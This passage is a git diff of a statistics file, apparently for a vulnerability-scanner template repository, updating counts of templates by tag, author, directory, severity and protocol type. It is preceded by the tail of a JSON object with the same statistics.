(@tech)","count":7},{"name":"kophjager007","count":7},{"name":"dr_set","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"rootxharsh","count":5},{"name":"meme-lord","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"f1tz","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"impramodsargar","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"vsh00t","count":3},{"name":"shine","count":3},{"name":"_generic_human_","count":3},{"name":"fyoorer","count":3},{"name":"tess","count":3},{"name":"emenalf","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"0xprial","count":2},{"name":"swissky","count":2},{"name":"joeldeleep","count":2},{"name":"0xcrypto","count":2},{"name":"vavkamil","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"randomrobbie","count":2},{"name":"0xrudra","count":2},{"name":"lotusdll","count":2},{"name":"ehsahil","count":2},{"name":"x1m_martijn","count":2},{"name":"kiblyn11","count":2},{"name":"nkxxkn","count":2},{"name":"parth","count":2},{"name":"sushantkamble","count":2},{"name":"hahwul","count":2},{"name":"foulenzer","count":2},{"name":"incogbyte","count":2},{"name":"dheerajmadhukar","count":2},{"name":"fabaff","count":2},{"name":"unstabl3","count":2},{"name":"koti2","count":2},{"name":"pxmme1337","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"bsysop","count":2},{"name":"0xelkomy","count":2},{"name":"davidmckennirey","count":2},{"name":"afaq","count":2},{"name":"bing0o","count":2},{"name":"amsda","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsapra","count":2},{"name":"zomsop82","count":2},{"name":"ree4pwn","count":2},{"name":"alifathi-h1","count":2},{"name":"lu4nx","count":2},{"name":"bp0lr","count":2},{"name":"gal nagli","count":2},{"name":"hetroublemakr","count":2},{"name":"w4cky_","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"arcc","count":2},{"name":"soyelmago","count":1},{"name":"c3l3si4n","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ooooooo_q","count":1},{"name":"flag007","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"huowuzhao","count":1},{"name":"chron0x","count":1},{"name":"0xtavian","count":1},{"name":"j33n1k4","count":1},{"name":"alph4byt3","count":1},{"name":"r3naissance","count":1},{"name":"s1r1u5_","count":1},{"name":"qlkwej","count":1},{"name":"undefl0w","count":1},{"name":"andysvints","count":1},{"name":"sy3omda","count":1},{"name":"52971","count":1},{"name":"d0rkerdevil","count":1},{"name":"pratik khalane","count":1},{"name":"akshansh","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"furkansenan","count":1},{"name":"nytr0gen","count":1},{"name":"yashgoti","count":1},{"name":"absshax","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"ringo","count":1},{"name":"mesaglio","count":1},{"name":"cookiehanhoan","count":1},{"name":"_harleo","count":1},{"name":"daviey","count":1},{"name":"akash.c","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"pudsec","count":1},{"name":"yashanand155","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"hanlaomo","count":1},{"name":"rodnt","count":1},{"name":"luskabol","count":1},{"name":"wabafet","count":1},{"name":"sickwell","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"rtcms","count":1},{"name":"mubassirpatel","count":1},{"name":"idealphase","count":1},{"name":"zhenwarx","count":1},{"name":"sullo","count":1},{"name":"schniggie","count":1},{"name":"jeya seelan","count":1},{"name":"micha3lb3n","count":1},{"name":"yavolo","count":1},{"name":"omarkurt","count":1},{"name":"noamrathaus","count":1},{"name":"bernardofsr","count":1},{"name":"its0x08","count":1},{"name":"iampritam","count":1},{"name":"mohammedsaneem","count":1},{"name":"juicypotato1","count":1},{"name":"mass0ma","count":1},{"name":"naglinagli","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"un-fmunozs","count":1},{"name":"tirtha_mandal","count":1},{"name":"kabirsuda","count":1},{"name":"hakluke","count":1},{"name":"_c0wb0y_","count":1},{"name":"bjhulst","count":1},{"name":"aresx","count":1},{"name":"geraldino2","count":1},{"name":"adrianmf","count":1},{"name":"whynotke","count":1},{"name":"revblock","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"knassar702","count":1},{"name":"toufik airane","count":1},{"name":"gboddin","count":1},{"name":"elder tao","count":1},{"name":"_darrenmartyn","count":1},{"name":"apt-mirror","count":1},{"name":"jteles","count":1},{"name":"makyotox","count":1},{"name":"me9187","count":1},{"name":"raesene","count":1},{"name":"vzamanillo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"ohlinge","count":1},{"name":"thevillagehacker","count":1},{"name":"taielab","count":1},{"name":"ilovebinbash","count":1},{"name":"blckraven","count":1},{"name":"thezakman","count":1},{"name":"@dwisiswant0","count":1},{"name":"ldionmarcil","count":1},{"name":"shreyapohekar","count":1},{"name":"andirrahmani1","count":1},{"name":"dogasantos","count":1},{"name":"mhdsamx","count":1},{"name":"zandros0","count":1},{"name":"affix","count":1},{"name":"becivells","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"notsoevilweasel","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"tim_koopmans","count":1},{"name":"smaranchand","count":1},{"name":"regala_","count":1},{"name":"th3.d1p4k","count":1},{"name":"pdp","count":1},{"name":"deena","count":1},{"name":"intx0x80","count":1},{"name":"manuelbua","count":1},{"name":"divya_mudgal","count":1},{"name":"dawid czarnecki","count":1},{"name":"0h1in9e","count":1},{"name":"ajaysenr","count":1},{"name":"willd96","count":1},{"name":"0xrod","count":1},{"name":"philippdelteil","count":1},{"name":"johnjhacking","count":1},{"name":"retr0","count":1},{"name":"alex","count":1},{"name":"defr0ggy","count":1},{"name":"johnk3r","count":1},{"name":"elmahdi","count":1},{"name":"ipanda","count":1},{"name":"0ut0fb4nd","count":1},{"name":"sshell","count":1},{"name":"b0yd","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"luci","count":1},{"name":"mah3sec_","count":1},{"name":"bad5ect0r","count":1},{"name":"patralos","count":1},{"name":"shifacyclewla","count":1},{"name":"shelld3v","count":1},{"name":"ahmed sherif","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"alperenkesk","count":1},{"name":"fmunozs","count":1},{"name":"kareemse1im","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"streetofhackerr007","count":1},{"name":"co0nan","count":1},{"name":"b4uh0lz","count":1},{"name":"fopina","count":1},{"name":"bolli95","count":1},{"name":"exploitation","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"kurohost","count":1}],"directory":[{"name":"cves","count":597},{"name":"vulnerabilities","count":265},{"name":"exposed-panels","count":221},{"name":"exposures","count":174},{"name":"technologies","count":159},{"name":"misconfiguration","count":124},{"name":"takeovers","count":70},{"name":"default-logins","count":51},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":8},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":583},{"name":"high","count":465},{"name":"medium","count":387},{"name":"critical","count":226},{"name":"low","count":156}],"types":[{"name":"http","count":1720},{"name":"file","count":46},{"name":"network","count":35},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index c146e94e23..685258af51 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,698 +1,706 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 576 | pikpikcu | 234 | cves | 583 | info | 577 | http | 1696 | -| panel | 214 | dhiyaneshdk | 234 | vulnerabilities | 262 | high | 457 | file | 46 | -| xss | 213 | pdteam | 191 | exposed-panels | 216 | medium | 385 | network | 35 | -| wordpress | 198 | daffainfo | 128 | exposures | 174 | critical | 218 | dns | 11 | -| exposure | 196 | dwisiswant0 | 127 | technologies | 158 | low | 156 | | | -| rce | 183 | geeknik | 127 | misconfiguration | 124 | | | | | -| lfi | 168 | gy741 | 62 | takeovers | 70 | | | | | -| cve2020 | 155 | madrobot | 60 | default-logins | 50 | | | | | -| wp-plugin | 133 | princechaddha | 53 | file | 46 | | | | | -| tech | 100 | gaurang | 42 | workflows | 34 | | | | | -| cve2021 | 92 | pussycat0x | 40 | network | 27 | | | | | -| config | 91 | ice3man | 26 | miscellaneous | 27 | | | | | -| cve2019 | 86 | organiccrap | 24 | iot | 23 | | | | | -| cve2018 | 74 | 0x_akoko | 23 | dns | 11 | | | | | +| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 | +| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 | +| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 | +| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 | +| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | | +| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | | +| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | | +| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | | +| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | | +| tech | 101 | gaurang | 42 | workflows | 35 | | | | | +| cve2021 | 96 | pussycat0x | 41 | miscellaneous | 27 | | | | | +| config | 91 | ice3man | 26 | network | 27 | | | | | +| cve2019 | 87 | organiccrap | 24 | iot | 23 | | | | | +| cve2018 | 76 | 0x_akoko | 23 | dns | 11 | | | | | | takeover | 73 | philippedelteil | 17 | cnvd | 9 | | | | | | | 65 | sheikhrishad | 15 | fuzzing | 8 | | | | | -| apache | 64 | milo2012 | 14 | headless | 5 | | | | | -| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 54 | techbrunchfr | 13 | | | | | | | -| cve2017 | 47 | suman_kar | 12 | | | | | | | -| file | 46 | cyllective | 11 | | | | | | | -| iot | 44 | righettod | 10 | | | | | | | -| unauth | 42 | random_robbie | 10 | | | | | | | -| oob | 41 | r3dg33k | 9 | | | | | | | -| sqli | 35 | wdahlenb | 9 | | | | | | | -| network | 35 | hackergautam | 9 | | | | | | | -| ssrf | 30 | iamthefrogy | 8 | | | | | | | -| cve2016 | 30 | aashiq | 8 | | | | | | | -| workflow | 29 | that_juan_ | 8 | | | | | | | -| logs | 29 | nadino | 8 | | | | | | | +| token | 64 | milo2012 | 14 | headless | 5 | | | | | +| apache | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 55 | techbrunchfr | 13 | | | | | | | +| iot | 48 | suman_kar | 12 | | | | | | | +| cve2017 | 47 | cyllective | 11 | | | | | | | +| file | 46 | random_robbie | 10 | | | | | | | +| oob | 44 | r3dg33k | 10 | | | | | | | +| unauth | 42 | righettod | 10 | | | | | | | +| network | 35 | wdahlenb | 9 | | | | | | | +| sqli | 35 | hackergautam | 9 | | | | | | | +| cve2016 | 32 | nadino | 8 | | | | | | | +| ssrf | 31 | aashiq | 8 | | | | | | | +| workflow | 30 | iamthefrogy | 8 | | | | | | | +| logs | 29 | that_juan_ | 8 | | | | | | | | oracle | 29 | melbadry9 | 8 | | | | | | | -| misc | 27 | kophjager007 | 7 | | | | | | | -| jira | 26 | techryptic (@tech) | 7 | | | | | | | -| atlassian | 26 | oppsec | 7 | | | | | | | -| redirect | 25 | randomstr1ng | 7 | | | | | | | -| listing | 24 | harshbothra_ | 7 | | | | | | | -| aem | 19 | emadshanab | 7 | | | | | | | -| cisco | 18 | dr_set | 7 | | | | | | | -| sap | 18 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 18 | caspergn | 6 | | | | | | | -| disclosure | 17 | puzzlepeaches | 6 | | | | | | | -| springboot | 15 | __fazal | 6 | | | | | | | +| misc | 27 | emadshanab | 7 | | | | | | | +| atlassian | 26 | techryptic (@tech) | 7 | | | | | | | +| jira | 26 | dr_set | 7 | | | | | | | +| redirect | 25 | harshbothra_ | 7 | | | | | | | +| listing | 24 | 0x240x23elu | 7 | | | | | | | +| aem | 19 | randomstr1ng | 7 | | | | | | | +| generic | 19 | kophjager007 | 7 | | | | | | | +| sap | 18 | oppsec | 7 | | | | | | | +| cve2015 | 18 | puzzlepeaches | 6 | | | | | | | +| cisco | 18 | caspergn | 6 | | | | | | | +| disclosure | 17 | __fazal | 6 | | | | | | | +| springboot | 15 | yanyun | 5 | | | | | | | +| cve2014 | 15 | ganofins | 5 | | | | | | | +| joomla | 15 | panch0r3d | 5 | | | | | | | +| cve2012 | 14 | iamnoooob | 5 | | | | | | | | debug | 14 | pentest_swissky | 5 | | | | | | | -| cve2012 | 14 | rootxharsh | 5 | | | | | | | -| cve2014 | 14 | panch0r3d | 5 | | | | | | | -| android | 13 | yanyun | 5 | | | | | | | -| misconfig | 13 | joanbono | 5 | | | | | | | -| struts | 13 | iamnoooob | 5 | | | | | | | -| auth-bypass | 13 | ganofins | 5 | | | | | | | +| auth-bypass | 13 | joanbono | 5 | | | | | | | | cve2011 | 13 | meme-lord | 5 | | | | | | | -| adobe | 12 | e_schultze_ | 4 | | | | | | | -| dns | 12 | github.com/its0x08 | 4 | | | | | | | -| weblogic | 12 | xelkomy | 4 | | | | | | | +| android | 13 | rootxharsh | 5 | | | | | | | +| misconfig | 13 | e_schultze_ | 4 | | | | | | | +| struts | 13 | xelkomy | 4 | | | | | | | | jenkins | 12 | elsfa7110 | 4 | | | | | | | -| dlink | 12 | nodauf | 4 | | | | | | | -| devops | 11 | jarijaas | 3 | | | | | | | -| fuzz | 11 | fyoorer | 3 | | | | | | | -| zoho | 11 | _generic_human_ | 3 | | | | | | | +| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | +| adobe | 12 | nodauf | 4 | | | | | | | +| dlink | 12 | mavericknerd | 3 | | | | | | | +| dns | 12 | yash anand @yashanand155 | 3 | | | | | | | +| router | 11 | _generic_human_ | 3 | | | | | | | +| zoho | 11 | f1tz | 3 | | | | | | | | php | 11 | vsh00t | 3 | | | | | | | -| joomla | 11 | f1tz | 3 | | | | | | | -| cve2013 | 11 | dudez | 3 | | | | | | | -| router | 11 | tess | 3 | | | | | | | -| magento | 9 | thomas_from_offensity | 3 | | | | | | | -| ftp | 8 | mavericknerd | 3 | | | | | | | -| xxe | 8 | impramodsargar | 3 | | | | | | | -| rails | 8 | yash anand @yashanand155 | 3 | | | | | | | -| cnvd | 8 | shine | 3 | | | | | | | -| gitlab | 8 | emenalf | 3 | | | | | | | +| devops | 11 | fyoorer | 3 | | | | | | | +| fuzz | 11 | dudez | 3 | | | | | | | +| cve2013 | 11 | binaryfigments | 3 | | | | | | | +| cve2010 | 9 | thomas_from_offensity | 3 | | | | | | | +| magento | 9 | impramodsargar | 3 | | | | | | | +| xxe | 8 | 0w4ys | 3 | | | | | | | | airflow | 8 | shifacyclewala | 3 | | | | | | | -| aws | 8 | z3bd | 3 | | | | | | | -| ruijie | 8 | binaryfigments | 3 | | | | | | | -| vmware | 7 | 0w4ys | 3 | | | | | | | -| cve2009 | 7 | lotusdll | 2 | | | | | | | -| scada | 7 | gevakun | 2 | | | | | | | -| login | 7 | randomrobbie | 2 | | | | | | | +| rails | 8 | shine | 3 | | | | | | | +| ruijie | 8 | z3bd | 3 | | | | | | | +| gitlab | 8 | jarijaas | 3 | | | | | | | +| cnvd | 8 | emenalf | 3 | | | | | | | +| aws | 8 | tess | 3 | | | | | | | +| ftp | 8 | amsda | 2 | | | | | | | +| scada | 7 | manas_harsh | 2 | | | | | | | +| vmware | 7 | x1m_martijn | 2 | | | | | | | | nginx | 7 | hahwul | 2 | | | | | | | -| dell | 6 | koti2 | 2 | | | | | | | -| cve2010 | 6 | ree4pwn | 2 | | | | | | | -| cms | 6 | random-robbie | 2 | | | | | | | -| coldfusion | 6 | pxmme1337 | 2 | | | | | | | -| rconfig | 6 | amsda | 2 | | | | | | | +| cve2009 | 7 | zomsop82 | 2 | | | | | | | +| login | 7 | randomrobbie | 2 | | | | | | | +| citrix | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | | solr | 6 | lu4nx | 2 | | | | | | | -| laravel | 6 | zomsop82 | 2 | | | | | | | -| api | 6 | 0xsapra | 2 | | | | | | | -| citrix | 6 | alifathi-h1 | 2 | | | | | | | -| jetty | 6 | afaq | 2 | | | | | | | -| google | 6 | swissky | 2 | | | | | | | -| backup | 6 | w4cky_ | 2 | | | | | | | -| drupal | 5 | bsysop | 2 | | | | | | | -| headless | 5 | 0xelkomy | 2 | | | | | | | -| lucee | 5 | sushantkamble | 2 | | | | | | | -| iis | 5 | dheerajmadhukar | 2 | | | | | | | -| ibm | 5 | ehsahil | 2 | | | | | | | -| files | 5 | davidmckennirey | 2 | | | | | | | -| wp-theme | 5 | bp0lr | 2 | | | | | | | -| java | 5 | udit_thakkur | 2 | | | | | | | -| circarlife | 5 | manas_harsh | 2 | | | | | | | +| google | 6 | alifathi-h1 | 2 | | | | | | | +| jetty | 6 | incogbyte | 2 | | | | | | | +| coldfusion | 6 | moritz nentwig | 2 | | | | | | | +| laravel | 6 | arcc | 2 | | | | | | | +| dell | 6 | nkxxkn | 2 | | | | | | | +| cms | 6 | unstabl3 | 2 | | | | | | | +| api | 6 | random-robbie | 2 | | | | | | | +| rconfig | 6 | 0xcrypto | 2 | | | | | | | +| backup | 6 | koti2 | 2 | | | | | | | +| netgear | 5 | davidmckennirey | 2 | | | | | | | +| headless | 5 | swissky | 2 | | | | | | | +| files | 5 | ree4pwn | 2 | | | | | | | +| django | 5 | afaq | 2 | | | | | | | | ssti | 5 | 0xprial | 2 | | | | | | | -| fileupload | 5 | hetroublemakr | 2 | | | | | | | -| netgear | 5 | joeldeleep | 2 | | | | | | | -| confluence | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| django | 5 | vavkamil | 2 | | | | | | | -| phpmyadmin | 5 | incogbyte | 2 | | | | | | | -| dedecms | 5 | 0xrudra | 2 | | | | | | | -| windows | 4 | fabaff | 2 | | | | | | | -| docker | 4 | x1m_martijn | 2 | | | | | | | -| solarwinds | 4 | 0xcrypto | 2 | | | | | | | -| tomcat | 4 | gal nagli | 2 | | | | | | | -| vpn | 4 | foulenzer | 2 | | | | | | | -| magmi | 4 | nkxxkn | 2 | | | | | | | -| webserver | 4 | unstabl3 | 2 | | | | | | | -| nodejs | 4 | moritz nentwig | 2 | | | | | | | -| thinkphp | 4 | bing0o | 2 | | | | | | | -| deserialization | 4 | kiblyn11 | 2 | | | | | | | -| asp | 4 | makyotox | 1 | | | | | | | -| moodle | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| jolokia | 4 | micha3lb3n | 1 | | | | | | | -| crlf | 4 | defr0ggy | 1 | | | | | | | -| thinkcmf | 4 | mohammedsaneem | 1 | | | | | | | -| samsung | 4 | alph4byt3 | 1 | | | | | | | -| zimbra | 4 | furkansenan | 1 | | | | | | | -| traversal | 4 | ratnadip gajbhiye | 1 | | | | | | | -| artifactory | 4 | apt-mirror | 1 | | | | | | | -| hongdian | 4 | thevillagehacker | 1 | | | | | | | -| elastic | 4 | mah3sec_ | 1 | | | | | | | -| springcloud | 3 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| printer | 3 | chron0x | 1 | | | | | | | -| ebs | 3 | qlkwej | 1 | | | | | | | -| backups | 3 | abison_binoy | 1 | | | | | | | -| resin | 3 | ldionmarcil | 1 | | | | | | | -| fanruan | 3 | johnk3r | 1 | | | | | | | -| kafka | 3 | _harleo | 1 | | | | | | | -| slack | 3 | bad5ect0r | 1 | | | | | | | -| bitrix | 3 | retr0 | 1 | | | | | | | -| microsoft | 3 | sickwell | 1 | | | | | | | -| bypass | 3 | me9187 | 1 | | | | | | | -| r-seenet | 3 | idealphase | 1 | | | | | | | -| itop | 3 | @dwisiswant0 | 1 | | | | | | | -| tikiwiki | 3 | berkdusunur | 1 | | | | | | | -| kubernetes | 3 | dawid czarnecki | 1 | | | | | | | -| openssh | 3 | zhenwarx | 1 | | | | | | | -| mongodb | 3 | regala_ | 1 | | | | | | | -| git | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| log | 3 | andirrahmani1 | 1 | | | | | | | -| targa | 3 | notsoevilweasel | 1 | | | | | | | -| kevinlab | 3 | revblock | 1 | | | | | | | -| caucho | 3 | b4uh0lz | 1 | | | | | | | -| httpd | 3 | akash.c | 1 | | | | | | | -| lfr | 3 | yavolo | 1 | | | | | | | -| zhiyuan | 3 | ooooooo_q | 1 | | | | | | | -| nacos | 3 | thezakman | 1 | | | | | | | -| fpd | 3 | elmahdi | 1 | | | | | | | -| hp | 3 | its0x08 | 1 | | | | | | | -| symfony | 3 | 0h1in9e | 1 | | | | | | | -| zabbix | 3 | whynotke | 1 | | | | | | | -| cve2008 | 3 | zandros0 | 1 | | | | | | | -| oa | 3 | gboddin | 1 | | | | | | | -| grafana | 3 | flag007 | 1 | | | | | | | -| ofbiz | 3 | patralos | 1 | | | | | | | -| vbulletin | 3 | hakluke | 1 | | | | | | | -| microstrategy | 3 | co0nan | 1 | | | | | | | -| opensis | 3 | shifacyclewla | 1 | | | | | | | -| terramaster | 3 | kabirsuda | 1 | | | | | | | -| amazon | 3 | arcc | 1 | | | | | | | -| wso2 | 3 | huowuzhao | 1 | | | | | | | -| nosqli | 3 | undefl0w | 1 | | | | | | | -| ssh | 3 | luskabol | 1 | | | | | | | -| idrac | 2 | _darrenmartyn | 1 | | | | | | | -| huawei | 2 | b0yd | 1 | | | | | | | -| mail | 2 | mesaglio | 1 | | | | | | | -| hasura | 2 | ilovebinbash | 1 | | | | | | | -| wordfence | 2 | juicypotato1 | 1 | | | | | | | -| maian | 2 | streetofhackerr007 | 1 | | | | | | | -| vrealize | 2 | nytr0gen | 1 | | | | | | | -| seeyon | 2 | knassar702 | 1 | | | | | | | -| hjtcloud | 2 | fmunozs | 1 | | | | | | | -| frp | 2 | divya_mudgal | 1 | | | | | | | -| openfire | 2 | noamrathaus | 1 | | | | | | | -| jeedom | 2 | shelld3v | 1 | | | | | | | -| trixbox | 2 | bolli95 | 1 | | | | | | | -| nextjs | 2 | rodnt | 1 | | | | | | | -| service | 2 | affix | 1 | | | | | | | -| jboss | 2 | sshell | 1 | | | | | | | -| status | 2 | schniggie | 1 | | | | | | | -| guacamole | 2 | elder tao | 1 | | | | | | | -| nagios | 2 | yashgoti | 1 | | | | | | | -| nexus | 2 | pratik khalane | 1 | | | | | | | -| glassfish | 2 | andysvints | 1 | | | | | | | -| oauth | 2 | rojanrijal | 1 | | | | | | | -| openam | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| keycloak | 2 | @github.com/defr0ggy | 1 | | | | | | | -| hpe | 2 | ajaysenr | 1 | | | | | | | -| shellshock | 2 | toufik airane | 1 | | | | | | | -| cache | 2 | naglinagli | 1 | | | | | | | -| horde | 2 | sicksec | 1 | | | | | | | -| activemq | 2 | philippdelteil | 1 | | | | | | | -| injection | 2 | hanlaomo | 1 | | | | | | | -| smtp | 2 | yashanand155 | 1 | | | | | | | -| plesk | 2 | iampritam | 1 | | | | | | | -| spark | 2 | sy3omda | 1 | | | | | | | -| voipmonitor | 2 | alperenkesk | 1 | | | | | | | +| iis | 5 | hetroublemakr | 2 | | | | | | | +| confluence | 5 | kiblyn11 | 2 | | | | | | | +| java | 5 | fabaff | 2 | | | | | | | +| drupal | 5 | bp0lr | 2 | | | | | | | +| phpmyadmin | 5 | gevakun | 2 | | | | | | | +| circarlife | 5 | lotusdll | 2 | | | | | | | +| lucee | 5 | vavkamil | 2 | | | | | | | +| ibm | 5 | pxmme1337 | 2 | | | | | | | +| dedecms | 5 | parth | 2 | | | | | | | +| fileupload | 5 | w4cky_ | 2 | | | | | | | +| wp-theme | 5 | foulenzer | 2 | | | | | | | +| magmi | 4 | joeldeleep | 2 | | | | | | | +| deserialization | 4 | 0xrudra | 2 | | | | | | | +| vpn | 4 | 0xelkomy | 2 | | | | | | | +| crlf | 4 | udit_thakkur | 2 | | | | | | | +| samsung | 4 | dheerajmadhukar | 2 | | | | | | | +| artifactory | 4 | gal nagli | 2 | | | | | | | +| docker | 4 | bing0o | 2 | | | | | | | +| tomcat | 4 | bsysop | 2 | | | | | | | +| webserver | 4 | 0xsapra | 2 | | | | | | | +| moodle | 4 | sushantkamble | 2 | | | | | | | +| hongdian | 4 | ehsahil | 2 | | | | | | | +| zimbra | 4 | divya_mudgal | 1 | | | | | | | +| cve2008 | 4 | huowuzhao | 1 | | | | | | | +| jolokia | 4 | 52971 | 1 | | | | | | | +| firmware | 4 | kabirsuda | 1 | | | | | | | +| asp | 4 | sicksec | 1 | | | | | | | +| traversal | 4 | b0yd | 1 | | | | | | | +| nodejs | 4 | aresx | 1 | | | | | | | +| buffalo | 4 | d0rkerdevil | 1 | | | | | | | +| thinkcmf | 4 | makyotox | 1 | | | | | | | +| windows | 4 | geraldino2 | 1 | | | | | | | +| elastic | 4 | juicypotato1 | 1 | | | | | | | +| thinkphp | 4 | jeya seelan | 1 | | | | | | | +| solarwinds | 4 | rojanrijal | 1 | | | | | | | +| ebs | 3 | andysvints | 1 | | | | | | | +| backups | 3 | pudsec | 1 | | | | | | | +| vbulletin | 3 | @dwisiswant0 | 1 | | | | | | | +| symfony | 3 | 0ut0fb4nd | 1 | | | | | | | +| fpd | 3 | noamrathaus | 1 | | | | | | | +| wso2 | 3 | remonsec | 1 | | | | | | | +| nexus | 3 | zhenwarx | 1 | | | | | | | +| bypass | 3 | flag007 | 1 | | | | | | | +| amazon | 3 | philippdelteil | 1 | | | | | | | +| fanruan | 3 | mesaglio | 1 | | | | | | | +| log | 3 | elmahdi | 1 | | | | | | | +| printer | 3 | thezakman | 1 | | | | | | | +| tikiwiki | 3 | exploitation | 1 | | | | | | | +| openssh | 3 | c3l3si4n | 1 | | | | | | | +| resin | 3 | deena | 1 | | | | | | | +| nacos | 3 | rodnt | 1 | | | | | | | +| ssh | 3 | ringo | 1 | | | | | | | +| kafka | 3 | 0h1in9e | 1 | | | | | | | +| microsoft | 3 | ilovebinbash | 1 | | | | | | | +| hp | 3 | mhdsamx | 1 | | | | | | | +| httpd | 3 | manuelbua | 1 | | | | | | | +| ofbiz | 3 | sy3omda | 1 | | | | | | | +| caucho | 3 | revblock | 1 | | | | | | | +| nosqli | 3 | alex | 1 | | | | | | | +| springcloud | 3 | berkdusunur | 1 | | | | | | | +| microstrategy | 3 | mohammedsaneem | 1 | | | | | | | +| bitrix | 3 | becivells | 1 | | | | | | | +| lfr | 3 | ratnadip gajbhiye | 1 | | | | | | | +| mongodb | 3 | alph4byt3 | 1 | | | | | | | +| kubernetes | 3 | undefl0w | 1 | | | | | | | +| itop | 3 | rtcms | 1 | | | | | | | +| r-seenet | 3 | un-fmunozs | 1 | | | | | | | +| grafana | 3 | blckraven | 1 | | | | | | | +| opensis | 3 | alperenkesk | 1 | | | | | | | +| oa | 3 | naglinagli | 1 | | | | | | | +| git | 3 | me9187 | 1 | | | | | | | +| zhiyuan | 3 | jteles | 1 | | | | | | | +| zabbix | 3 | r3naissance | 1 | | | | | | | +| slack | 3 | shelld3v | 1 | | | | | | | +| targa | 3 | yashanand155 | 1 | | | | | | | +| terramaster | 3 | sickwell | 1 | | | | | | | +| kevinlab | 3 | shreyapohekar | 1 | | | | | | | +| smb | 2 | akash.c | 1 | | | | | | | +| telerik | 2 | fopina | 1 | | | | | | | +| hasura | 2 | 0xtavian | 1 | | | | | | | | xxljob | 2 | ohlinge | 1 | | | | | | | -| igs | 2 | sullo | 1 | | | | | | | -| akamai | 2 | alex | 1 | | | | | | | -| dolibarr | 2 | smaranchand | 1 | | | | | | | -| waf | 2 | daviey | 1 | | | | | | | -| rockethchat | 2 | d0rkerdevil | 1 | | | | | | | -| rockmongo | 2 | _c0wb0y_ | 1 | | | | | | | -| pega | 2 | c3l3si4n | 1 | | | | | | | -| emerge | 2 | tim_koopmans | 1 | | | | | | | -| natshell | 2 | manuelbua | 1 | | | | | | | -| prometheus | 2 | rtcms | 1 | | | | | | | -| kibana | 2 | 52971 | 1 | | | | | | | -| bigip | 2 | willd96 | 1 | | | | | | | -| chiyu | 2 | un-fmunozs | 1 | | | | | | | -| rstudio | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| jsf | 2 | cookiehanhoan | 1 | | | | | | | -| ecology | 2 | petruknisme | 1 | | | | | | | -| akkadian | 2 | absshax | 1 | | | | | | | -| paloalto | 2 | wabafet | 1 | | | | | | | -| proxy | 2 | blckraven | 1 | | | | | | | -| flir | 2 | 0xteles | 1 | | | | | | | -| globalprotect | 2 | bjhulst | 1 | | | | | | | -| backdoor | 2 | johnjhacking | 1 | | | | | | | -| dos | 2 | dogasantos 